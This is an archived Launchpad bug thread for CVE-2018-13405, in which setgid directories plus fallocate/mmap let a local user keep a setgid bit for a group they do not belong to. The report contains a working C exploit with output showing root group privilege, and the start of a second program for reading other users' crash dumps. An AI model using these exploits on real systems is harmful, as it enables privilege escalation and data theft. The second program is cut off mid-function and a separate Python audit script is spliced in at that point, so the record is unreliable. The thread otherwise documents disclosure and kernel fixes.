[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass

2021-11-08 Thread Po-Hsu Lin
** Changed in: linux (Ubuntu Cosmic)
   Status: In Progress => Won't Fix

** Changed in: linux (Ubuntu)
   Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1779923

Title:
  other users' coredumps can be read via setgid directory and killpriv
  bypass

Status in linux package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  Won't Fix

Bug description:
  Note: I am both sending this bug report to secur...@kernel.org and filing it
  in the Ubuntu bugtracker because I can't tell whether this counts as a kernel
  bug or as a Ubuntu bug. You may wish to talk to each other to determine the
  best place to fix this.

  I noticed halfdog's old writeup at
  https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/,
  describing essentially the following behavior in combination with a
  trick for then writing to the resulting file without triggering the
  killpriv logic:

  
  =
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat > demo.c
  #include <fcntl.h>
  /* creating a file with the setgid bit inside a setgid directory: the new
     file inherits the directory's group, not the caller's */
  int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
  user@debian:~/sgid_demo$ gcc -o demo demo.c
  user@debian:~/sgid_demo$ ./demo
  user@debian:~/sgid_demo$ ls -l dir/file
  -rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
  =

  
  Two patches for this were proposed on LKML back then:
  "[PATCH 1/2] fs: Check f_cred instead of current's creds in
  should_remove_suid()"
  https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/

  "[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid
  directory"
  https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/

  However, as far as I can tell, neither of them actually landed.

  
  You can also bypass the killpriv logic with fallocate() and mmap() -
  fallocate() permits resizing the file without triggering killpriv,
  mmap() permits writing without triggering killpriv (the mmap part is
  mentioned at
  https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/
  ):

  
  =
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat fallocate.c
  #define _GNU_SOURCE
  #include <fcntl.h>
  #include <err.h>
  #include <sys/stat.h>
  #include <sys/mman.h>
  #include <string.h>
  #include <unistd.h>
  #include <stdlib.h>

  int main(void) {
    /* source binary whose contents are copied into the setgid file */
    int src_fd = open("/usr/bin/id", O_RDONLY);
    if (src_fd == -1)
      err(1, "open 2");
    struct stat src_stat;
    if (fstat(src_fd, &src_stat))
      err(1, "fstat");
    int src_len = src_stat.st_size;
    char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
    if (src_mapping == MAP_FAILED)
      err(1, "mmap 2");

    /* new file inherits the setgid directory's group and keeps 02755 */
    int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
    if (fd == -1)
      err(1, "open");
    /* fallocate() resizes the file without going through write(), so the
       killpriv logic that would clear the setgid bit never runs */
    if (fallocate(fd, 0, 0, src_len))
      err(1, "fallocate");
    /* writing through a shared mapping likewise leaves the setgid bit alone */
    char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    if (mapping == MAP_FAILED)
      err(1, "mmap");

    memcpy(mapping, src_mapping, src_len);

    munmap(mapping, src_len);
    close(fd);
    close(src_fd);

    execl("./dir/file", "id", NULL);
    err(1, "execl");
  }
  user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
  user@debian:~/sgid_demo$ ./fallocate
  uid=1000(user) gid=1000(user) egid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
  =

  
  sys_copy_file_range() also looks as if it bypasses killpriv on
  supported filesystems, but I haven't tested that one so far.

  On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
  contains group-readable crashdumps in some custom format, so you can use this
  issue to steal other users' crashdumps:

  
  =
  user@ubuntu-18-04-vm:~$ ls -l /var/crash
  total 296
  -rw-r----- 1 user whoopsie  16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
  -rw-r----- 1 root whoopsie  50706 Jun 25 21:51 _usr_bin_id.0.crash
  -rw-r----- 1 user whoopsie  51842 Jun 25 21:42 _usr_bin_id.1000.crash
  -rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
  -rw-r----- 1 root whoopsie  18765 Jun 26 00:42 _usr_bin_xattr.0.crash
  user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
  cat: /var/crash/_usr_bin_id.0.crash: Permission denied
  user@ubuntu-18-04-vm:~$ cat fallocate.c 
  #define _GNU_SOURCE
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  int main(int argc, char **argv) {
if (argc != 2) {
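
As an added defender-side check (not code from the bug report, the kernel, or Ubuntu), the following Python script scans a directory tree for the two conditions the report combines: setgid directories that are writable by other users (such as /var/crash at mode 03777), and setgid executables owned by a user who is not a member of the file's group, which is the combination that the Bionic fix "Fix up non-directory creation in SGID directories" now strips at creation time. The sample records, gid 115 for "whoopsie" and the membership table are constructed values, not taken from a real system.

```python
"""Audit helper for the setgid-directory pattern described in the report.

A setgid directory that is writable by others lets any local user create files
that inherit the directory's group; on a kernel without the fix, the creator
could also keep the S_ISGID bit on such a file, yielding a setgid executable for
a group the creator does not belong to.  This scanner reports both conditions.
"""
import grp
import os
import pwd
import stat
import sys
from dataclasses import dataclass


@dataclass(frozen=True)
class Entry:
    path: str
    mode: int  # full st_mode, file-type bits included
    uid: int
    gid: int


def system_memberships():
    """Map uid -> set of gids (primary plus supplementary) from the local databases."""
    members = {}
    for pw in pwd.getpwall():
        members.setdefault(pw.pw_uid, set()).add(pw.pw_gid)
    for g in grp.getgrall():
        for name in g.gr_mem:
            try:
                members.setdefault(pwd.getpwnam(name).pw_uid, set()).add(g.gr_gid)
            except KeyError:
                continue  # group lists a user that no longer exists
    return members


def scan_tree(root):
    """lstat() every directory and file under root without following symlinks."""
    entries = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, n) for n in filenames]:
            try:
                st = os.lstat(path)
            except OSError:
                continue
            entries.append(Entry(path, st.st_mode, st.st_uid, st.st_gid))
    return entries


def audit(entries, memberships):
    """Return (path, reason) findings, in input order.

    exposed-dir: setgid directory writable by group or others, so files created
        there inherit a group the creator may not be in.
    setgid-file-foreign-group: non-directory with S_ISGID|S_IXGRP whose owner is
        neither root nor a member of the file's group; the fixed kernel drops
        S_ISGID when such a file is created.
    """
    setgid_exec = stat.S_ISGID | stat.S_IXGRP
    findings = []
    for e in entries:
        if stat.S_ISDIR(e.mode):
            if e.mode & stat.S_ISGID and e.mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((e.path, "exposed-dir"))
        elif (e.mode & setgid_exec) == setgid_exec:
            # root holds CAP_FSETID, so a root-owned setgid binary is expected
            if e.uid != 0 and e.gid not in memberships.get(e.uid, set()):
                findings.append((e.path, "setgid-file-foreign-group"))
    return findings


# Constructed records mirroring the report's layout; gid 115 for "whoopsie" and
# uid 1000's group list are assumed values, not taken from a real system.
SAMPLE_ENTRIES = [
    Entry("/var/crash", stat.S_IFDIR | 0o3777, 0, 115),
    Entry("/var/crash/_usr_bin_id.0.crash", stat.S_IFREG | 0o640, 0, 115),
    Entry("/home/user/sgid_demo/dir", stat.S_IFDIR | 0o3777, 0, 0),  # sudo mkdir -m03777
    Entry("/home/user/sgid_demo/dir/file", stat.S_IFREG | 0o2755, 1000, 0),  # inherited gid 0
    Entry("/usr/bin/wall", stat.S_IFREG | 0o2755, 0, 5),  # legitimate root-owned setgid tty
    Entry("/tmp", stat.S_IFDIR | 0o1777, 0, 0),  # sticky but not setgid
]
SAMPLE_MEMBERSHIPS = {0: {0}, 1000: {1000, 27}}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        findings = audit(scan_tree(sys.argv[1]), system_memberships())
    else:
        findings = audit(SAMPLE_ENTRIES, SAMPLE_MEMBERSHIPS)
    for path, reason in findings:
        print(f"{reason:26} {path}")
```

Run with a path (for example /var/crash) to audit a live system; without arguments it reports on the constructed sample.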
  

[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass

2018-08-23 Thread Launchpad Bug Tracker
This bug was fixed in the package linux - 3.13.0-157.207

---
linux (3.13.0-157.207) trusty; urgency=medium

  * linux: 3.13.0-157.207 -proposed tracker (LP: #1787982)

  * CVE-2017-5715 (Spectre v2 retpoline)
- SAUCE: Fix "x86/retpoline/entry: Convert entry assembler indirect jumps"

  * CVE-2017-2583
- KVM: x86: fix emulation of "MOV SS, null selector"

  * CVE-2017-7518
- KVM: x86: fix singlestepping over syscall

  * CVE-2017-18270
- KEYS: prevent creating a different user's keyrings

  * Update to upstream's implementation of Spectre v1 mitigation (LP: #1774181)
- Documentation: Document array_index_nospec
- array_index_nospec: Sanitize speculative array de-references
- x86: Implement array_index_mask_nospec
- x86: Introduce barrier_nospec
- x86/get_user: Use pointer masking to limit speculation
- x86/syscall: Sanitize syscall table de-references under speculation
- vfs, fdtable: Prevent bounds-check bypass via speculative execution
- nl80211: Sanitize array index in parse_txq_params
- x86/spectre: Report get_user mitigation for spectre_v1
- x86/kvm: Update spectre-v1 mitigation
- nospec: Allow index argument to have const-qualified type
- nospec: Move array_index_nospec() parameter checking into separate macro
- nospec: Kill array_index_nospec_mask_check()
- SAUCE: Replace osb() calls with array_index_nospec()
- SAUCE: Rename osb() to barrier_nospec()
- SAUCE: x86: Use barrier_nospec in arch/x86/um/asm/barrier.h

  * Prevent speculation on user controlled pointer (LP: #1775137)
- x86: reorganize SMAP handling in user space accesses
- x86: fix SMAP in 32-bit environments
- x86: Introduce __uaccess_begin_nospec() and uaccess_try_nospec
- x86/usercopy: Replace open coded stac/clac with __uaccess_{begin, end}
- x86/uaccess: Use __uaccess_begin_nospec() and uaccess_try_nospec

  * CVE-2016-10208
- ext4: validate s_first_meta_bg at mount time
- ext4: fix fencepost in s_first_meta_bg validation

  * CVE-2018-10323
- xfs: set format back to extents if xfs_bmap_extents_to_btree

  * CVE-2017-16911
- usbip: prevent vhci_hcd driver from leaking a socket pointer address

  * CVE-2018-13406
- video: uvesafb: Fix integer overflow in allocation

  * CVE-2018-10877
- ext4: verify the depth of extent tree in ext4_find_extent()

  * CVE-2018-10881
- ext4: clear i_data in ext4_inode_info when removing inline data

  * CVE-2018-1092
- ext4: fail ext4_iget for root directory if unallocated

  * CVE-2018-1093
- ext4: fix block bitmap validation when bigalloc, ^flex_bg
- ext4: add validity checks for bitmap block numbers

  * CVE-2018-12233
- jfs: Fix inconsistency between memory allocation and ea_buf->max_size

  * CVE-2017-16912
- usbip: fix stub_rx: get_pipe() to validate endpoint number

  * CVE-2018-10675
- mm/mempolicy: fix use after free when calling get_mempolicy

  * CVE-2017-8831
- saa7164: fix sparse warnings
- saa7164: fix double fetch PCIe access condition

  * CVE-2017-16533
- HID: usbhid: fix out-of-bounds bug

  * CVE-2017-16538
- media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner
- media: dvb-usb-v2: lmedm04: Improve logic checking of warm start

  * CVE-2017-16644
- hdpvr: Remove deprecated create_singlethread_workqueue
- media: hdpvr: Fix an error handling path in hdpvr_probe()

  * CVE-2017-16645
- Input: ims-psu - check if CDC union descriptor is sane

  * CVE-2017-5549
- USB: serial: kl5kusb105: fix line-state error handling

  * CVE-2017-16532
- usb: usbtest: fix NULL pointer dereference

  * CVE-2017-16537
- media: imon: Fix null-ptr-deref in imon_probe

  * CVE-2017-11472
- ACPICA: Add additional debug info/statements
- ACPICA: Namespace: fix operand cache leak

  * CVE-2017-16643
- Input: gtco - fix potential out-of-bound access

  * CVE-2017-16531
- USB: fix out-of-bounds in usb_set_configuration

  * CVE-2018-10124
- kernel/signal.c: avoid undefined behaviour in kill_something_info

  * CVE-2017-6348
- irda: Fix lockdep annotations in hashbin_delete().

  * CVE-2017-17558
- USB: core: prevent malicious bNumInterfaces overflow

  * CVE-2017-5897
- ip6_gre: fix ip6gre_err() invalid reads

  * CVE-2017-6345
- SAUCE: import sock_efree()
- net/llc: avoid BUG_ON() in skb_orphan()

  * CVE-2017-7645
- nfsd: check for oversized NFSv2/v3 arguments

  * CVE-2017-9984
- ALSA: msnd: Optimize / harden DSP and MIDI loops

  * CVE-2018-1000204
- scsi: sg: allocate with __GFP_ZERO in sg_build_indirect()

  * CVE-2018-10021
- scsi: libsas: defer ata device eh commands to libata

  * CVE-2017-16914
- usbip: fix stub_send_ret_submit() vulnerability to null transfer_buffer

  * CVE-2017-16913
- usbip: fix stub_rx: harden CMD_SUBMIT path to handle malicious input

  * CVE-2017-16535
- USB: core: fix out-of-bounds access bug in 

[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass

2018-08-23 Thread Launchpad Bug Tracker
This bug was fixed in the package linux - 4.4.0-134.160

---
linux (4.4.0-134.160) xenial; urgency=medium

  * linux: 4.4.0-134.160 -proposed tracker (LP: #1787177)

  * locking sockets broken due to missing AppArmor socket mediation patches
(LP: #1780227)
- UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets

  * Backport namespaced fscaps to xenial 4.4 (LP: #1778286)
- Introduce v3 namespaced file capabilities
- commoncap: move assignment of fs_ns to avoid null pointer dereference
- capabilities: fix buffer overread on very short xattr
- commoncap: Handle memory allocation failure.

  * Xenial update to 4.4.140 stable release (LP: #1784409)
- usb: cdc_acm: Add quirk for Uniden UBC125 scanner
- USB: serial: cp210x: add CESINEL device ids
- USB: serial: cp210x: add Silicon Labs IDs for Windows Update
- n_tty: Fix stall at n_tty_receive_char_special().
- staging: android: ion: Return an ERR_PTR in ion_map_kernel
- n_tty: Access echo_* variables carefully.
- x86/boot: Fix early command-line parsing when matching at end
- ath10k: fix rfc1042 header retrieval in QCA4019 with eth decap mode
- i2c: rcar: fix resume by always initializing registers before transfer
- ipv4: Fix error return value in fib_convert_metrics()
- kprobes/x86: Do not modify singlestep buffer while resuming
- nvme-pci: initialize queue memory before interrupts
- netfilter: nf_tables: use WARN_ON_ONCE instead of BUG_ON in nft_do_chain()
- ARM: dts: imx6q: Use correct SDMA script for SPI5 core
- ubi: fastmap: Correctly handle interrupted erasures in EBA
- mm: hugetlb: yield when prepping struct pages
- tracing: Fix missing return symbol in function_graph output
- scsi: sg: mitigate read/write abuse
- s390: Correct register corruption in critical section cleanup
- drbd: fix access after free
- cifs: Fix infinite loop when using hard mount option
- jbd2: don't mark block as modified if the handle is out of credits
- ext4: make sure bitmaps and the inode table don't overlap with bg
  descriptors
- ext4: always check block group bounds in ext4_init_block_bitmap()
- ext4: only look at the bg_flags field if it is valid
- ext4: verify the depth of extent tree in ext4_find_extent()
- ext4: include the illegal physical block in the bad map ext4_error msg
- ext4: clear i_data in ext4_inode_info when removing inline data
- ext4: add more inode number paranoia checks
- ext4: add more mount time checks of the superblock
- ext4: check superblock mapped prior to committing
- HID: i2c-hid: Fix "incomplete report" noise
- HID: hiddev: fix potential Spectre v1
- HID: debug: check length before copy_to_user()
- x86/mce: Detect local MCEs properly
- x86/mce: Fix incorrect "Machine check from unknown source" message
- media: cx25840: Use subdev host data for PLL override
- mm, page_alloc: do not break __GFP_THISNODE by zonelist reset
- dm bufio: avoid sleeping while holding the dm_bufio lock
- dm bufio: drop the lock when doing GFP_NOIO allocation
- mtd: rawnand: mxc: set spare area size register explicitly
- dm bufio: don't take the lock in dm_bufio_shrink_count
- mtd: cfi_cmdset_0002: Change definition naming to retry write operation
- mtd: cfi_cmdset_0002: Change erase functions to retry for error
- mtd: cfi_cmdset_0002: Change erase functions to check chip good only
- netfilter: nf_log: don't hold nf_log_mutex during user access
- staging: comedi: quatech_daqp_cs: fix no-op loop daqp_ao_insn_write()
- Linux 4.4.140

  * Xenial update to 4.4.139 stable release (LP: #1784382)
- xfrm6: avoid potential infinite loop in _decode_session6()
- netfilter: ebtables: handle string from userspace with care
- ipvs: fix buffer overflow with sync daemon and service
- atm: zatm: fix memcmp casting
- net: qmi_wwan: Add Netgear Aircard 779S
- net/sonic: Use dma_mapping_error()
- Revert "Btrfs: fix scrub to repair raid6 corruption"
- tcp: do not overshoot window_clamp in tcp_rcv_space_adjust()
- Btrfs: make raid6 rebuild retry more
- usb: musb: fix remote wakeup racing with suspend
- bonding: re-evaluate force_primary when the primary slave name changes
- tcp: verify the checksum of the first data segment in a new connection
- ext4: update mtime in ext4_punch_hole even if no blocks are released
- ext4: fix fencepost error in check for inode count overflow during resize
- driver core: Don't ignore class_dir_create_and_add() failure.
- btrfs: scrub: Don't use inode pages for device replace
- ALSA: hda - Handle kzalloc() failure in snd_hda_attach_pcm_stream()
- ALSA: hda: add dock and led support for HP EliteBook 830 G5
- ALSA: hda: add dock and led support for HP ProBook 640 G4
- cpufreq: Fix new policy initialization during limits updates via 

[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass

2018-08-23 Thread Launchpad Bug Tracker
This bug was fixed in the package linux - 4.15.0-33.36

---
linux (4.15.0-33.36) bionic; urgency=medium

  * linux: 4.15.0-33.36 -proposed tracker (LP: #1787149)

  * RTNL assertion failure on ipvlan (LP: #1776927)
- ipvlan: drop ipv6 dependency
- ipvlan: use per device spinlock to protect addrs list updates
- SAUCE: fix warning from "ipvlan: drop ipv6 dependency"

  * ubuntu_bpf_jit test failed on Bionic s390x systems (LP: #1753941)
- test_bpf: flag tests that cannot be jited on s390

  * HDMI/DP audio can't work on the laptop of Dell Latitude 5495 (LP: #1782689)
- drm/nouveau: fix nouveau_dsm_get_client_id()'s return type
- drm/radeon: fix radeon_atpx_get_client_id()'s return type
- drm/amdgpu: fix amdgpu_atpx_get_client_id()'s return type
- platform/x86: apple-gmux: fix gmux_get_client_id()'s return type
- ALSA: hda: use PCI_BASE_CLASS_DISPLAY to replace PCI_CLASS_DISPLAY_VGA
- vga_switcheroo: set audio client id according to bound GPU id

  * locking sockets broken due to missing AppArmor socket mediation patches
(LP: #1780227)
- UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets

  * Update2 for ocxl driver (LP: #1781436)
- ocxl: Fix page fault handler in case of fault on dying process

  * netns: unable to follow an interface that moves to another netns
(LP: #1774225)
- net: core: Expose number of link up/down transitions
- dev: always advertise the new nsid when the netns iface changes
- dev: advertise the new ifindex when the netns iface changes

  * [Bionic] Disk IO hangs when using BFQ as io scheduler (LP: #1780066)
- block, bfq: fix occurrences of request finish method's old name
- block, bfq: remove batches of confusing ifdefs
- block, bfq: add requeue-request hook

  * HP ProBook 455 G5 needs mute-led-gpio fixup (LP: #1781763)
- ALSA: hda: add mute led support for HP ProBook 455 G5

  * [Bionic] bug fixes to improve stability of the ThunderX2 i2c driver
(LP: #1781476)
- i2c: xlp9xx: Fix issue seen when updating receive length
- i2c: xlp9xx: Make sure the transfer size is not more than
  I2C_SMBUS_BLOCK_SIZE

  * x86/kvm: fix LAPIC timer drift when guest uses periodic mode (LP: #1778486)
- x86/kvm: fix LAPIC timer drift when guest uses periodic mode

  * Please include ax88179_178a and r8152 modules in d-i udeb (LP: #1771823)
- [Config:] d-i: Add ax88179_178a and r8152 to nic-modules

  * Nvidia fails after switching its mode (LP: #1778658)
- PCI: Restore config space on runtime resume despite being unbound

  * Kernel error "task zfs:pid blocked for more than 120 seconds" (LP: #1781364)
- SAUCE: (noup) zfs to 0.7.5-1ubuntu16.3

  * CVE-2018-12232
- PATCH 1/1] socket: close race condition between sock_close() and
  sockfs_setattr()

  * CVE-2018-10323
- xfs: set format back to extents if xfs_bmap_extents_to_btree

  * change front mic location for more lenovo m7/8/9xx machines (LP: #1781316)
- ALSA: hda/realtek - Fix the problem of two front mics on more machines
- ALSA: hda/realtek - two more lenovo models need fixup of MIC_LOCATION

  * Cephfs + fscache: unable to handle kernel NULL pointer dereference at
 IP: jbd2__journal_start+0x22/0x1f0 (LP: #1783246)
- ceph: track read contexts in ceph_file_info

  * Touchpad of ThinkPad P52 failed to work with message "lost sync at byte"
(LP: #1779802)
- Input: elantech - fix V4 report decoding for module with middle key
- Input: elantech - enable middle button of touchpads on ThinkPad P52

  * xhci_hcd :00:14.0: Root hub is not suspended (LP: #1779823)
- usb: xhci: dbc: Fix lockdep warning
- usb: xhci: dbc: Don't decrement runtime PM counter if DBC is not started

  * CVE-2018-13406
- video: uvesafb: Fix integer overflow in allocation

  * CVE-2018-10840
- ext4: correctly handle a zero-length xattr with a non-zero e_value_offs

  * CVE-2018-11412
- ext4: do not allow external inodes for inline data

  * CVE-2018-10881
- ext4: clear i_data in ext4_inode_info when removing inline data

  * CVE-2018-12233
- jfs: Fix inconsistency between memory allocation and ea_buf->max_size

  * CVE-2018-12904
- kvm: nVMX: Enforce cpl=0 for VMX instructions

  * Error parsing PCC subspaces from PCCT (LP: #1528684)
- mailbox: PCC: erroneous error message when parsing ACPI PCCT

  * CVE-2018-13094
- xfs: don't call xfs_da_shrink_inode with NULL bp

  * other users' coredumps can be read via setgid directory and killpriv bypass
(LP: #1779923) // CVE-2018-13405
- Fix up non-directory creation in SGID directories

  * Invoking obsolete 'firmware_install' target breaks snap build (LP: #1782166)
- snapcraft.yaml: stop invoking the obsolete (and non-existing)
  'firmware_install' target

  * snapcraft.yaml: missing ubuntu-retpoline-extract-one script breaks the build
(LP: #1782116)
- snapcraft.yaml: copy 

[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass

2018-07-26 Thread Mathew Hodson
** No longer affects: whoopsie (Ubuntu)

** No longer affects: whoopsie (Ubuntu Trusty)

** No longer affects: whoopsie (Ubuntu Xenial)

** No longer affects: whoopsie (Ubuntu Bionic)

** No longer affects: whoopsie (Ubuntu Cosmic)


Title:
  other users' coredumps can be read via setgid directory and killpriv
  bypass

Status in linux package in Ubuntu:
  In Progress
Status in linux source package in Trusty:
  In Progress
Status in linux source package in Xenial:
  In Progress
Status in linux source package in Bionic:
  In Progress
Status in linux source package in Cosmic:
  In Progress


[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass

2018-07-16 Thread Tyler Hicks
I don't think the Security or Foundations teams plan to make any changes
in Whoopsie so I'm marking these tasks as invalid.

** Changed in: whoopsie (Ubuntu Trusty)
   Status: New => Invalid

** Changed in: whoopsie (Ubuntu Xenial)
   Status: New => Invalid

** Changed in: whoopsie (Ubuntu Bionic)
   Status: New => Invalid

** Changed in: whoopsie (Ubuntu Cosmic)
   Status: New => Invalid


Title:
  other users' coredumps can be read via setgid directory and killpriv
  bypass

Status in linux package in Ubuntu:
  In Progress
Status in whoopsie package in Ubuntu:
  Invalid
Status in linux source package in Trusty:
  In Progress
Status in whoopsie source package in Trusty:
  Invalid
Status in linux source package in Xenial:
  In Progress
Status in whoopsie source package in Xenial:
  Invalid
Status in linux source package in Bionic:
  In Progress
Status in whoopsie source package in Bionic:
  Invalid
Status in linux source package in Cosmic:
  In Progress
Status in whoopsie source package in Cosmic:
  Invalid
